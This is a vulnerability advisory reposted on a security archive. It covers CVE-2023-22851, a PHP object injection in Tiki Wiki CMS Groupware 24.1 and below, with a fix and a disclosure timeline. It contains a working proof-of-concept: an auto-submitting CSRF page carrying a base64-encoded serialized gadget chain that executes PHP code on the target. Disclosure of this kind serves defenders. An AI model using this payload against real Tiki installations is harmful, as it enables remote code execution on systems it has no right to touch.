exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection

Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection
Posted Jan 10, 2023
Authored by EgiX | Site karmainsecurity.com

Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.

tags | exploit, php
advisories | CVE-2023-22851
SHA-256 | 1b6698ff49dd75e5444eb0fdffd03d9806fd9c813b8e9255172cc30fc8eee07c

Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection

Change Mirror Download
----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP
Object Injection Vulnerability
----------------------------------------------------------------------------------------------------


[-] Software Link:

https://tiki.org


[-] Affected Versions:

Version 24.1 and prior versions.


[-] Vulnerability Description:

The vulnerability is located in the
/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when
importing data from WordPress sites through the Tiki Importer, user
input passed through the uploaded XML file is being used in a call to
the unserialize() PHP function. This can be exploited by malicious users
to inject arbitrary PHP objects into the application scope, allowing
them to perform a variety of attacks, such as executing arbitrary PHP
code. Successful exploitation of this vulnerability requires an admin
account (specifically, the ‘tiki_p_admin_importer’ permission). However,
due to the CSRF vulnerability described in KIS-2023-01, this
vulnerability might also be exploited by tricking a victim user into
opening a web page like the following:

<html>
<form action="http://localhost/tiki/tiki-importer.php" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="importerClassName"
value="TikiImporter_Blog_Wordpress" />
<input type="hidden" name="importAttachments" value="on" />
<input type="file" name="importFile" id="fileinput"/>
</form>
<script>
const xmlContent =
atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw
ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");
const fileInput = document.getElementById("fileinput");
const dataTransfer = new DataTransfer();
const file = new File([xmlContent], "test.xml", {type: "text/xml"});
dataTransfer.items.add(file);
fileInput.files = dataTransfer.files;
document.forms[0].submit();
</script>
</html>


[-] Solution:

Upgrade to version 24.2 or later.


[-] Disclosure Timeline:

[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-22851 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2023-04

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    19 Files
  • 25
    Jun 25th
    5 Files
  • 26
    Jun 26th
    13 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close